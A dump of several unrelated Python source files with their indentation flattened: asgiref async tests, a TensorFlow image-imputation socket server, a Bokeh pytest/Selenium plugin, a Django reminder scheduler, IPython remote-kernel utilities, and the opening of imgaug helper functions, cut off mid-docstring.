# Sync level 1
def level1():
level2()
level1 = sync_to_async(level1, thread_sensitive=True)
# Async level 2
@async_to_sync
async def level2():
await level3()
# Sync level 3
def level3():
level4()
level3 = sync_to_async(level3, thread_sensitive=True)
# Async level 4
@async_to_sync
async def level4():
result["thread"] = threading.current_thread()
# Run it
await level1()
assert result["thread"] == threading.current_thread()
class ASGITest(TestCase):
"""
Tests collection of async cases inside classes
"""
@async_to_sync
async def test_wrapped_case_is_collected(self):
self.assertTrue(True)
def test_sync_to_async_detected_as_coroutinefunction():
"""
Tests that SyncToAsync functions are detected as coroutines.
"""
def sync_func():
return
assert not asyncio.iscoroutinefunction(sync_to_async)
assert asyncio.iscoroutinefunction(sync_to_async(sync_func))
|
multi-threaded.py
|
#!/bin/python3
import argparse
import multiprocessing as mp
import numpy as np
from sklearn.preprocessing import LabelEncoder
import socket
import sys
import time
import tensorflow as tf
import traceback
import impute
import serialize
# disable eager mode -> run in graph mode
tf.compat.v1.disable_eager_execution()
def worker(geohashes, model_path, server_sock, weight_path):
# initialize encoder
le = LabelEncoder()
encoder = le.fit(args.geohash)
# open model
tf.keras.backend.clear_session()
layers = open(args.model, 'r')
model_structure = layers.read()
layers.close()
model = tf.keras.models.model_from_json(model_structure)
model.load_weights(args.weights)
# first prediction is time consuming, building the GPU function
model.predict((np.zeros((1, 3, 256, 256, 3)),
np.zeros((1, 1)),
np.zeros((1, 1)),
np.zeros((1, 1)),
np.zeros((1, 16, 16, 3))))
# make model read only, thread safe
session = tf.compat.v1.keras.backend.get_session()
tf.python.keras.backend.set_session(session)
session.graph.finalize()
while 1:
try:
# accept connection
sock, address = server_sock.accept()
# read batch metadata
sentinel2_batch, modis_batch, geohash_batch, \
timestamp_batch = serialize.read_batch(sock)
# compute input tensor
tensor = impute.compile_tensor(sentinel2_batch,
modis_batch, encoder, geohash_batch, timestamp_batch)
# impute images
imputed_images = impute.impute_batch(model, tensor)
# write imputed images
serialize.write_images(imputed_images,
sentinel2_batch[0][0], sock)
# close client connection
sock.close()
except:
traceback.print_exc()
if __name__ == '__main__':
# parse arguments
parser = argparse.ArgumentParser(description='impute stip images')
parser.add_argument('-i', '--ip-address', type=str,
help='server ip address', default='0.0.0.0')
parser.add_argument('-g', '--geohash', action='append',
help='geohashes handled by this node', required=True)
parser.add_argument('-m', '--model',
help='model location', required=True)
parser.add_argument('-p', '--port', type=int,
help='server port', default='12289')
parser.add_argument('-t', '--thread-count', type=int,
help='number of worker threads', default=33)
parser.add_argument('-w', '--weights',
help='model weights location', required=True)
args = parser.parse_args()
# open server socket
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server_sock.bind((args.ip_address, args.port))
server_sock.listen(8)
except socket.error as msg:
print('failed to bind socket: ' + str(msg[0]) + ' ' + msg[1])
sys.exit()
# initialize workers
workers = [mp.Process(target=worker, args=(args.geohash, args.model, server_sock, args.weights, )) for i in range(args.thread_count)]
# start workers
for p in workers:
p.daemon = True
p.start()
while True:
try:
time.sleep(10)
except KeyboardInterrupt:
if server_sock:
server_sock.close()
break
except:
traceback.print_exc()
break
if server_sock:
server_sock.close()
|
project.py
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2021, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Define a Pytest plugin for a Bokeh-specific testing tools
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import annotations
import logging # isort:skip
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
import socket
import time
from contextlib import closing
from threading import Thread
# External imports
import pytest
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from tornado.ioloop import IOLoop
from tornado.web import RequestHandler
# Bokeh imports
import bokeh.server.views.ws as ws
from bokeh._testing.util.selenium import INIT, RESULTS, wait_for_canvas_resize
from bokeh.io import save
from bokeh.server.server import Server
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
pytest_plugins = (
"bokeh._testing.plugins.project",
"bokeh._testing.plugins.file_server",
"bokeh._testing.plugins.selenium",
)
__all__ = (
'bokeh_app_info',
'bokeh_model_page',
'bokeh_server_page',
'find_free_port',
'output_file_url',
'single_plot_page',
'test_file_path_and_url',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
@pytest.fixture
def output_file_url(request, file_server):
from bokeh.io import output_file
filename = request.function.__name__ + '.html'
file_obj = request.fspath.dirpath().join(filename)
file_path = file_obj.strpath
url = file_path.replace('\\', '/') # Windows-proof
output_file(file_path, mode='inline')
def tear_down():
if file_obj.isfile():
file_obj.remove()
request.addfinalizer(tear_down)
return file_server.where_is(url)
@pytest.fixture
def test_file_path_and_url(request, file_server):
filename = request.function.__name__ + '.html'
file_obj = request.fspath.dirpath().join(filename)
file_path = file_obj.strpath
url = file_path.replace('\\', '/') # Windows-proof
def tear_down():
if file_obj.isfile():
file_obj.remove()
request.addfinalizer(tear_down)
return file_path, file_server.where_is(url)
class _ExitHandler(RequestHandler):
def initialize(self, io_loop):
self.io_loop = io_loop
async def get(self, *args, **kwargs):
self.io_loop.stop()
def find_free_port():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(('', 0))
return s.getsockname()[1]
@pytest.fixture
def bokeh_app_info(request, driver):
''' Start a Bokeh server app and return information needed to test it.
Returns a tuple (url, message_test_port), where the latter is defined as
namedtuple('MessageTestPort', ['sent', 'received'])
and will contain all messages that the Bokeh Server sends/receives while
running during the test.
'''
def func(modify_doc):
from collections import namedtuple
MessageTestPort = namedtuple('MessageTestPort', ['sent', 'received'])
ws._message_test_port = MessageTestPort([], [])
port = find_free_port()
def worker():
io_loop = IOLoop()
server = Server({'/': modify_doc},
port=port,
io_loop=io_loop,
extra_patterns=[('/exit', _ExitHandler, dict(io_loop=io_loop))])
server.start()
server.io_loop.start()
t = Thread(target=worker)
t.start()
def cleanup():
driver.get("http://localhost:%d/exit" % port)
# XXX (bev) this line is a workaround for https://github.com/bokeh/bokeh/issues/7970
# and should be removed when that issue is resolved
driver.get_log('browser')
ws._message_test_port = None
t.join()
request.addfinalizer(cleanup)
return "http://localhost:%d/" % port, ws._message_test_port
return func
class _BokehPageMixin:
@property
def results(self):
WebDriverWait(self._driver, 10).until(EC.staleness_of(self.test_div))
self.test_div = self._driver.find_element_by_class_name("bokeh-test-div")
return self._driver.execute_script(RESULTS)
@property
def driver(self):
return self._driver
def init_results(self):
self._driver.execute_script(INIT)
self.test_div = self._driver.find_element_by_class_name("bokeh-test-div")
def click_element_at_position(self, element, x, y):
actions = ActionChains(self._driver)
actions.move_to_element_with_offset(element, x, y)
actions.click()
actions.perform()
def double_click_element_at_position(self, element, x, y):
actions = ActionChains(self._driver)
actions.move_to_element_with_offset(element, x, y)
actions.click()
actions.click()
actions.perform()
def drag_element_at_position(self, element, x, y, dx, dy, mod=None):
actions = ActionChains(self._driver)
if mod:
actions.key_down(mod)
actions.move_to_element_with_offset(element, x, y)
actions.click_and_hold()
actions.move_by_offset(dx, dy)
actions.release()
if mod:
actions.key_up(mod)
actions.perform()
def send_keys(self, *keys):
actions = ActionChains(self._driver)
actions.send_keys(*keys)
actions.perform()
def has_no_console_errors(self):
return self._has_no_console_errors(self._driver)
class _BokehModelPage(_BokehPageMixin):
def __init__(self, model, driver, output_file_url, has_no_console_errors):
self._driver = driver
self._model = model
self._has_no_console_errors = has_no_console_errors
save(self._model)
self._driver.get(output_file_url)
self.init_results()
class _CanvasMixin:
def click_canvas_at_position(self, x, y):
self.click_element_at_position(self.canvas, x, y)
def double_click_canvas_at_position(self, x, y):
self.double_click_element_at_position(self.canvas, x, y)
def click_custom_action(self):
button = self._driver.find_element_by_class_name("bk-toolbar-button-custom-action")
button.click()
def drag_canvas_at_position(self, x, y, dx, dy, mod=None):
self.drag_element_at_position(self.canvas, x, y, dx, dy, mod)
def get_toolbar_button(self, name):
return self.driver.find_element_by_class_name('bk-tool-icon-' + name)
@pytest.fixture()
def bokeh_model_page(driver, output_file_url, has_no_console_errors):
def func(model):
return _BokehModelPage(model, driver, output_file_url, has_no_console_errors)
return func
class _SinglePlotPage(_BokehModelPage, _CanvasMixin):
# model may be a layout, but should only contain a single plot
def __init__(self, model, driver, output_file_url, has_no_console_errors):
super().__init__(model, driver, output_file_url, has_no_console_errors)
self.canvas = self._driver.find_element_by_tag_name('canvas')
wait_for_canvas_resize(self.canvas, self._driver)
@pytest.fixture()
def single_plot_page(driver, output_file_url, has_no_console_errors):
def func(model):
return _SinglePlotPage(model, driver, output_file_url, has_no_console_errors)
return func
class _BokehServerPage(_BokehPageMixin, _CanvasMixin):
def __init__(self, modify_doc, driver, bokeh_app_info, has_no_console_errors):
self._driver = driver
self._has_no_console_errors = has_no_console_errors
self._app_url, self.message_test_port = bokeh_app_info(modify_doc)
time.sleep(0.1)
self._driver.get(self._app_url)
self.init_results()
self.canvas = self._driver.find_element_by_tag_name('canvas')
wait_for_canvas_resize(self.canvas, self._driver)
@pytest.fixture()
def bokeh_server_page(driver, bokeh_app_info, has_no_console_errors):
def func(modify_doc):
return _BokehServerPage(modify_doc, driver, bokeh_app_info, has_no_console_errors)
return func
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
scheduler.py
|
import logging
from sys import stdout
from datetime import datetime
from threading import Timer, Thread
from django.dispatch import receiver
from reminders.models import Reminder, ReminderType
from main.utilities import send_reminder_email, create_notification
from django.db.models.signals import post_save, pre_delete, post_delete
class UserAlertScheduler():
"""
User Alert Scheduler is our implementation of a reminder scheduler when the user wants to be
notified at a specific time.
The User Alert Scheduler is dependent on the DB and registered to save and delete events,
- When the user adds a new reminder the scheduler will add the new reminder if his time is lower
than the time in the current reminder.
- When the user deletes a reminder the scheduler will change his current reminder if it was
the same reminder and schedule the next reminder in line.
** Because the scheduler is only relevant when there is an action in the DB and will not be called
from outside of the class, each method defined is private and static.
In addition this is a Singleton object and will be created once at the start of the reminder app.
The current methods which the scheduler support are reminder_email and send_site_notification.
Other functions can be added to the _get_function method that takes an enum
ReminderType is defined in the Reminder model.
Each function needs to be as follows: function_name(message, <user>).
<user> is the user model defined in our User model.
This scheduler also has a logger object, because it is a complicated implementation there can be a lot
of errors and missed calls, so a logger has been placed with info and debug calls.
"""
__logger = None # the logger object of the class
__instance = None # the instance of the class
__current_timer = None # the current reminder timer the scheduler is running
__current_reminder = None # the current reminder the scheduler is working on
def __new__(self):
"""
__new__ is used because we want to make the scheduler a singletone
there is an __instance object and it is checked every time if it has been initialized
if so the __instance will be returned otherwise this is the first time and it will be initialized
"""
if not UserAlertScheduler.__instance:
UserAlertScheduler.__logger = self.define_logger()
UserAlertScheduler.__logger.debug("creating a new instance of UserAlertScheduler")
UserAlertScheduler.__instance = super(UserAlertScheduler, self).__new__(self)
return UserAlertScheduler.__instance
@staticmethod
def define_logger(file=stdout, log_level=logging.WARNING):
""" define the __logger object.
file: where the logger will log all his message. default is stdout
logger level: define which types of logger message will show up. default Warning """
log_format = "%(levelname)s %(asctime)s - %(message)s"
logging.basicConfig(filemode=file, level=log_level, format=log_format)
return logging.getLogger(__name__)
@staticmethod
def __clean_up(self):
""" remove late reminders.
Each reminder that has been scheduled is deleted at the end of the action
if there are reminders that the scheduler didn't schedule before his initialization
then they are a late reminders, reminders that should have been scheduled but
there time has passed, in this case the schedule will delete them all """
UserAlertScheduler.__logger.info("in clean up")
for reminder in Reminder.objects.order_by('date_time'):
# check each reminder time against the current time
if UserAlertScheduler.__get_time_difference(reminder.date_time) < 0:
Reminder.objects.get(id=reminder.id).delete()
@staticmethod
def __get_time_difference(date_time):
""" return the time difference between the given date_time to our current time """
return date_time.timestamp() - datetime.now().timestamp()
@staticmethod
def _get_args(reminder):
""" get the date time, message, method type and user id from the reminder object """
message = reminder.messages
method_type = reminder.method
date_time = reminder.date_time
user_id = reminder.participant_id.user_id
return date_time, message, method_type, user_id
@staticmethod
def _get_function(method_type):
""" get the functions to invoke using the method type given """
function_to_invoke = list()
if method_type in (ReminderType.EMAIL, ReminderType.WEBSITE_EMAIL):
function_to_invoke.append(send_reminder_email)
if method_type in (ReminderType.WEBSITE, ReminderType.WEBSITE_EMAIL):
function_to_invoke.append(create_notification)
return function_to_invoke
@staticmethod
def __add_alert(reminder=None):
""" add a new alert.
the schedule will check against his current reminder if the reminder
given has a better time then his own, if so the scheduler will stop
the timer and replace the current reminder with the newly given reminder.
reminder: a reminder object as defined in the Reminder model,
if nothing is given as the reminder object then
the reminder will be selected as the minimum date_time of all reminders """
UserAlertScheduler.__logger.info("in add alert.")
UserAlertScheduler.__logger.debug(f"reminder value in: {reminder}")
# the reminder given is None, get the next reminder from the DB using the date_time field
if not reminder:
reminder = Reminder.objects.get_next_reminder()
UserAlertScheduler.__logger.debug(f"reminder value after if: {reminder}")
if not reminder: # the DB is empty, end the function
UserAlertScheduler.__logger.debug("The DB is empty, there isn't a task waiting.")
return None
# get all the arguments from the reminder object
_, message, method_type, user_id = UserAlertScheduler._get_args(reminder)
functions = UserAlertScheduler._get_function(method_type)
UserAlertScheduler.__current_reminder = reminder
# start a new daemon thread for setting the current timer with the new reminder arguments
if UserAlertScheduler.__current_timer is not None and UserAlertScheduler.__current_timer.is_alive():
UserAlertScheduler.__current_timer.cancel()
Thread(target=UserAlertScheduler.__create_timer, args=(functions, message, user_id), daemon=True).start()
UserAlertScheduler.__logger.debug((
"new Timer has been started. ",
f"message: {message} - {user_id} - {UserAlertScheduler.__current_reminder.date_time}"
))
@staticmethod
def __create_timer(functions, message, user_id):
""" create the timer object.
The scheduler needs a timer object that will go off when a specific time has been reached
"Timer" is a class defined in Python's own threading library that gets a time and a method to invoke.
This function set the current timer to be a new timer object with
time: the difference of the reminder time and the current time
target: the function given using the _get_function class
args: the argument that the function gets, a message and the user_id object
** this function is run using a different thread because the timer itself
can cause a few problems with the migrate and the current thread running it.
"""
UserAlertScheduler.__current_timer = Timer(
UserAlertScheduler.__get_time_difference(UserAlertScheduler.__current_reminder.date_time),
UserAlertScheduler.__alert_user,
args=(functions, message, user_id)
)
UserAlertScheduler.__current_timer.start() # start the timer object
@staticmethod
def __remove_alert(reminder_id):
""" remove the reminder with a reminder_id from the queue.
The scheduler will check if the reminder given is the current reminder
if so the scheduler will remove it and the current timer,
and will set a new reminder with its own timer according to the add_alert function
"""
UserAlertScheduler.__logger.info("in remove alert")
if UserAlertScheduler.__current_reminder:
if UserAlertScheduler.__current_reminder.id == reminder_id:
if UserAlertScheduler.__current_timer:
if UserAlertScheduler.__current_timer.is_alive(): # check if the timer is still running
UserAlertScheduler.__current_timer.cancel()
UserAlertScheduler.__current_reminder = None
UserAlertScheduler.__current_timer = None
UserAlertScheduler.__logger.debug(
f"removed the current reminder. last reminder: {Reminder.objects.get(id=reminder_id)}"
)
else:
UserAlertScheduler.__logger.warning(
(f"the reminder {UserAlertScheduler.__current_reminder}"
" is the current reminder but has no timer")
)
@staticmethod
def __modifie_alert(reminder):
""" modifie the reminder in the queue.
The scheduler will check if the given reminder is the current reminder object
if so the scheduler will check if the time has been changed,
if the time has been increased then the scheduler will try to add a new reminder instead
otherwise, the remainder will be changed in the scheduler to the reminder object given
"""
UserAlertScheduler.__logger.info("in modifie alert")
if reminder != UserAlertScheduler.__current_reminder:
UserAlertScheduler.__logger.debug(
f"The two reminders are not the same.\n{UserAlertScheduler.__current_reminder} vs {reminder}"
)
next_reminder = None
if reminder.date_time < UserAlertScheduler.__current_reminder.date_time:
next_reminder = reminder
UserAlertScheduler.__logger.debug(f"a new reminder is added: {next_reminder}")
else:
UserAlertScheduler.__current_reminder = reminder
UserAlertScheduler.__logger.debug(f"the current reminder has been modified: {reminder}")
print(f"the current reminder has been modified: {reminder}")
@staticmethod
def __alert_user(methods, *args, **kwargs):
""" alert the user when the time of the reminder has been reached.
methods: the functions to invoke
other arguments: such as message and user_id """
UserAlertScheduler.__logger.info("in alert user")
UserAlertScheduler.__logger.debug("starting to loop over all the functions")
UserAlertScheduler.__logger.debug(f"args: {args} || kwargs: {kwargs}")
for method in methods:
method(*args, **kwargs)
# Potential Send Signal - a signal can be sent for alerting that the timer has ended
UserAlertScheduler.__logger.debug("deleting the current task from the DB.")
# remove the current reminder from the db
current_reminder_instance = Reminder.objects.get(id=UserAlertScheduler.__current_reminder.id)
if current_reminder_instance:
current_reminder_instance.delete()
@staticmethod
@receiver(post_save, sender=Reminder)
def __check_after_saving(sender, instance, **kwargs):
""" add a new alert.
The scheduler will check if the current reminder object has been set
- if not then the scheduler will call add an alert
- otherwise the instance (reminder) will be checked if it is the current reminder
if so the user has changed something in the reminder as a result the scheduler
will call modify alert instead.
** this is a function that implements the signal post save
as a result this function takes the arguments sender, instance, **kwargs exactly
without change in the names or order of the variables,
any changes can cause an exception.
"""
UserAlertScheduler.__logger.info("in check after saving")
UserAlertScheduler.__logger.debug("post save")
UserAlertScheduler.__logger.debug(f"instance: {instance}")
if UserAlertScheduler.__current_reminder:
if UserAlertScheduler.__current_reminder.id == instance.id:
UserAlertScheduler.__logger.debug(
f"the reminder has been changed: {UserAlertScheduler.__current_reminder} vs {instance}"
)
UserAlertScheduler.__modifie_alert(instance)
elif UserAlertScheduler.__current_reminder.date_time < instance.date_time:
UserAlertScheduler.__logger.debug("end post: the timer time hasn't been changed")
return None
UserAlertScheduler.__logger.debug(f"set new alert: {instance}")
UserAlertScheduler.__add_alert(instance)
@staticmethod
@receiver(pre_delete, sender=Reminder)
def __check_before_delete(sender, instance, **kwargs):
""" remove the alert from the queue.
The scheduler will call remove alert to check if the instance (reminder)
is in fact the current reminder, and will schedule a new reminder if need be.
** this is a function that implements the signal pre delete
as a result this function takes the arguments sender, instance, **kwargs exactly
without change in the names or order of the variables,
any changes can cause an exception.
"""
UserAlertScheduler.__logger.info("in check before delete")
UserAlertScheduler.__logger.debug("pre delete")
UserAlertScheduler.__logger.debug(f"removing the reminder: {instance}")
UserAlertScheduler.__remove_alert(instance.id)
@staticmethod
@receiver(post_delete, sender=Reminder)
def __check_after_delete(sender, instance, **kwargs):
""" set a new reminder if the current reminder is None
The scheduler delete each reminder at the end of his time
as a result a pre delete signal is being called, the scheduler check
that the reminder is the current reminder and set it to None
Then the post delete signal is called and the scheduler will schedule a new reminder
after the deletion of the last reminder.
** this is a function that implements the signal pre save
as a result this function takes the arguments sender, instance, **kwargs exactly
without change in the names or order of the variables,
any changes can cause an exception.
"""
UserAlertScheduler.__logger.info("in check after delete")
UserAlertScheduler.__logger.debug("post delete")
if not UserAlertScheduler.__current_reminder:
UserAlertScheduler.__logger.debug(
"current task and current timer are None, the last reminder has been deleted."
)
UserAlertScheduler.__logger.debug("search a new reminder to insert")
UserAlertScheduler.__add_alert()
|
_ipython_utils.py
|
"""Utilities for integrating with IPython
These functions should probably reside in Jupyter and IPython repositories,
after which we can import them instead of having our own definitions.
"""
from __future__ import print_function
import atexit
import os
try:
import queue
except ImportError:
# Python 2
import Queue as queue
from subprocess import Popen
import sys
from threading import Thread
from uuid import uuid4
from tornado.gen import TimeoutError
from tornado.ioloop import IOLoop
from threading import Event
from IPython import get_ipython
from jupyter_client import BlockingKernelClient, write_connection_file
from jupyter_core.paths import jupyter_runtime_dir
OUTPUT_TIMEOUT = 10
def run_cell_remote(ip, kc, cell):
"""Run a cell on a KernelClient
Any output from the cell will be redisplayed in the local session.
"""
msg_id = kc.execute(cell)
in_kernel = getattr(ip, "kernel", False)
if in_kernel:
socket = ip.display_pub.pub_socket
session = ip.display_pub.session
parent_header = ip.display_pub.parent_header
while True:
try:
msg = kc.get_iopub_msg(timeout=OUTPUT_TIMEOUT)
except queue.Empty:
raise TimeoutError("Timeout waiting for IPython output")
if msg["parent_header"].get("msg_id") != msg_id:
continue
msg_type = msg["header"]["msg_type"]
content = msg["content"]
if msg_type == "status":
if content["execution_state"] == "idle":
# idle means output is done
break
elif msg_type == "stream":
stream = getattr(sys, content["name"])
stream.write(content["text"])
elif msg_type in ("display_data", "execute_result", "error"):
if in_kernel:
session.send(socket, msg_type, content, parent=parent_header)
else:
if msg_type == "error":
print("\n".join(content["traceback"]), file=sys.stderr)
else:
sys.stdout.write(content["data"].get("text/plain", ""))
else:
pass
def register_worker_magic(connection_info, magic_name="worker"):
"""Register a %worker magic, given connection_info.
Both a line and cell magic are registered,
which run the given cell in a remote kernel.
"""
ip = get_ipython()
info = dict(connection_info) # copy
key = info.pop("key")
kc = BlockingKernelClient(**connection_info)
kc.session.key = key
kc.start_channels()
def remote(line, cell=None):
"""Run the current cell on a remote IPython kernel"""
if cell is None:
# both line and cell magic
cell = line
run_cell_remote(ip, kc, cell)
remote.client = kc # preserve reference on kc, largely for mocking
ip.register_magic_function(remote, magic_kind="line", magic_name=magic_name)
ip.register_magic_function(remote, magic_kind="cell", magic_name=magic_name)
def remote_magic(line, cell=None):
"""A magic for running code on a specified remote worker
The connection_info dict of the worker will be looked up
as the first positional arg to the magic.
The rest of the line (or the entire cell for a %%cell magic)
will be passed to the remote kernel.
Usage:
info = e.start_ipython(worker)[worker]
%remote info print(worker.data)
"""
# get connection info from IPython's user namespace
ip = get_ipython()
split_line = line.split(None, 1)
info_name = split_line[0]
if info_name not in ip.user_ns:
raise NameError(info_name)
connection_info = dict(ip.user_ns[info_name])
if not cell: # line magic, use the rest of the line
if len(split_line) == 1:
raise ValueError("I need some code to run!")
cell = split_line[1]
# turn info dict to hashable str for use as lookup key in _clients cache
key = ",".join(map(str, sorted(connection_info.items())))
session_key = connection_info.pop("key")
if key in remote_magic._clients:
kc = remote_magic._clients[key]
else:
kc = BlockingKernelClient(**connection_info)
kc.session.key = session_key
kc.start_channels()
kc.wait_for_ready(timeout=10)
remote_magic._clients[key] = kc
# actually run the code
run_cell_remote(ip, kc, cell)
# cache clients for re-use in remote magic
remote_magic._clients = {}
def register_remote_magic(magic_name="remote"):
"""Define the parameterized %remote magic
See remote_magic above for details.
"""
ip = get_ipython()
if ip is None:
return # do nothing if IPython's not running
ip.register_magic_function(remote_magic, magic_kind="line", magic_name=magic_name)
ip.register_magic_function(remote_magic, magic_kind="cell", magic_name=magic_name)
def connect_qtconsole(connection_info, name=None, extra_args=None):
"""Open a QtConsole connected to a worker who has the given future
- identify worker with who_has
- start IPython kernel on the worker
- start qtconsole connected to the kernel
"""
runtime_dir = jupyter_runtime_dir()
if name is None:
name = uuid4().hex
path = os.path.join(runtime_dir, name + ".json")
write_connection_file(path, **connection_info)
cmd = ["jupyter", "qtconsole", "--existing", path]
if extra_args:
cmd.extend(extra_args)
Popen(cmd)
@atexit.register
def _cleanup_connection_file():
"""Cleanup our connection file when we exit."""
try:
os.remove(path)
except OSError:
pass
def start_ipython(ip=None, ns=None, log=None):
"""Start an IPython kernel in a thread
Parameters
----------
ip: str
The IP address to listen on (likely the parent object's ip).
ns: dict
Any names that should be injected into the IPython namespace.
log: logger instance
Hook up IPython's logging to an existing logger instead of the default.
"""
from IPython import get_ipython
if get_ipython() is not None:
raise RuntimeError("Cannot start IPython, it's already running.")
from zmq.eventloop.ioloop import ZMQIOLoop
from ipykernel.kernelapp import IPKernelApp
# save the global IOLoop instance
# since IPython relies on it, but we are going to put it in a thread.
save_inst = IOLoop.instance()
IOLoop.clear_instance()
zmq_loop = ZMQIOLoop()
zmq_loop.install()
# start IPython, disabling its signal handlers that won't work due to running in a thread:
app = IPKernelApp.instance(log=log)
# Don't connect to the history database
app.config.HistoryManager.hist_file = ":memory:"
# listen on all interfaces, so remote clients can connect:
if ip:
app.ip = ip
# disable some signal handling, logging
def noop():
return None
app.init_signal = noop
app.log_connection_info = noop
# start IPython in a thread
# initialization happens in the thread to avoid threading problems
# with the sqlite history
evt = Event()
def _start():
app.initialize([])
app.kernel.pre_handler_hook = noop
app.kernel.post_handler_hook = noop
app.kernel.start()
app.kernel.loop = IOLoop.instance()
# save self in the IPython namespace as 'worker'
# inject things into the IPython namespace
if ns:
app.kernel.shell.user_ns.update(ns)
evt.set()
zmq_loop.start()
zmq_loop_thread = Thread(target=_start)
zmq_loop_thread.daemon = True
zmq_loop_thread.start()
assert evt.wait(timeout=5), "IPython didn't start in a reasonable amount of time."
# put the global IOLoop instance back:
IOLoop.clear_instance()
save_inst.install()
return app
|
imgaug.py
|
from __future__ import print_function, division, absolute_import
import random
import numpy as np
import copy
import numbers
import cv2
import math
from scipy import misc, ndimage
import multiprocessing
import threading
import sys
import six
import six.moves as sm
import os
from skimage import draw
if sys.version_info[0] == 2:
import cPickle as pickle
from Queue import Empty as QueueEmpty
elif sys.version_info[0] == 3:
import pickle
from queue import Empty as QueueEmpty
xrange = range
ALL = "ALL"
# filepath to the quokka image
QUOKKA_FP = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"quokka.jpg"
)
DEFAULT_FONT_FP = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"DejaVuSans.ttf"
)
# We instantiate a current/global random state here once.
# One can also call np.random, but that is (in contrast to np.random.RandomState)
# a module and hence cannot be copied via deepcopy. That's why we use RandomState
# here (and in all augmenters) instead of np.random.
CURRENT_RANDOM_STATE = np.random.RandomState(42)
def is_np_array(val):
"""
Checks whether a variable is a numpy array.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a numpy array. Otherwise False.
"""
# using np.generic here seems to also fire for scalar numpy values even
# though those are not arrays
#return isinstance(val, (np.ndarray, np.generic))
return isinstance(val, np.ndarray)
def is_single_integer(val):
"""
Checks whether a variable is an integer.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is an integer. Otherwise False.
"""
return isinstance(val, numbers.Integral)
def is_single_float(val):
"""
Checks whether a variable is a float.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a float. Otherwise False.
"""
return isinstance(val, numbers.Real) and not is_single_integer(val)
def is_single_number(val):
"""
Checks whether a variable is a number, i.e. an integer or float.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a number. Otherwise False.
"""
return is_single_integer(val) or is_single_float(val)
def is_iterable(val):
"""
Checks whether a variable is iterable.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is an iterable. Otherwise False.
"""
# TODO make this more abstract, not just restricted to tuple/list
return isinstance(val, (tuple, list))
# TODO convert to is_single_string() or rename is_single_integer/float/number()
def is_string(val):
"""
Checks whether a variable is a string.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a string. Otherwise False.
"""
return isinstance(val, six.string_types)
def is_integer_array(val):
"""
Checks whether a variable is a numpy integer array.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a numpy integer array. Otherwise False.
"""
return is_np_array(val) and issubclass(val.dtype.type, np.integer)
def is_callable(val):
"""
Checks whether a variable is a callable, e.g. a function.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a callable. Otherwise False.
"""
# python 3.x with x <= 2 does not support callable(), apparently
if sys.version_info[0] == 3 and sys.version_info[1] <= 2:
return hasattr(val, '__call__')
else:
return callable(val)
def seed(seedval):
"""
Set the seed used by the global random state and thereby all randomness
in the library.
This random state is by default by all augmenters. Under special
circumstances (e.g. when an augmenter is switched to deterministic mode),
the global random state is replaced by another -- local -- one.
The replacement is dependent on the global random state.
Parameters
----------
seedval : int
The seed to
use.
"""
CURRENT_RANDOM_STATE.seed(seedval)
def current_random_state():
"""
Returns the current/global random state of the library.
Returns
----------
out : np.random.RandomState
The current/global random state.
"""
return CURRENT_RANDOM_STATE
def new_random_state(seed=None, fully_random=False):
"""
Returns a new random state.
Parameters
----------
seed : None or int, optional(default=None)
Optional seed value to use.
The same datatypes are allowed as for np.random.RandomState(seed).
fully_random : bool, optional(default=False)
Whether to use numpy's random initialization for the
RandomState (used if set to True). If False, a seed is sampled from
the global random state, which is a bit faster and hence the default.
Returns
-------
out : np.random.RandomState
The new random state.
"""
if seed is None:
if not fully_random:
# sample manually a seed instead of just RandomState(),
# because the latter one
# is way slower.
seed = CURRENT_RANDOM_STATE.randint(0, 10**6, 1)[0]
return np.random.RandomState(seed)
def dummy_random_state():
"""
Returns a dummy random state that is always based on a seed of 1.
Returns
-------
out : np.random.RandomState
The new random state.
"""
return np.random.RandomState(1)
def copy_random_state(random_state, force_copy=False):
"""
Creates a copy of a random state.
Parameters
----------
random_state : np.random.RandomState
The random state to
copy.
force_copy : bool, optional(default=False)
If True, this function will always create a copy of every random
state. If False, it will not copy numpy's default random state,
but all other random states.
Returns
-------
rs_copy : np.random.RandomState
The copied random state.
"""
if random_state == np.random and not force_copy:
return random_state
else:
rs_copy = dummy_random_state()
orig_state = random_state.get_state()
rs_copy.set_state(orig_state)
return rs_copy
def derive_random_state(random_state):
return derive_random_states(random_state, n=1)[0]
# TODO use this everywhere instead of manual seed + create
def derive_random_states(random_state, n=1):
seed = random_state.randint(0, 10**6, 1)[0]
return [new_random_state(seed+i) for i in sm.xrange(n)]
def forward_random_state(random_state):
random_state.uniform()
# TODO
# def from_json(json_str):
# pass
def quokka(size=None):
"""
Returns an image of a quokka as a numpy array.
Parameters
----------
size : None or float or tuple of two ints, optional(default=None)
Size of the output image. Input into scipy.misc.imresize.
Usually expected to be a tuple (H, W), where H is the desired height
and W is the width. If None, then the image will not be resized.
Returns
-------
img : (H,W,3) ndarray
The image array of dtype uint8.
"""
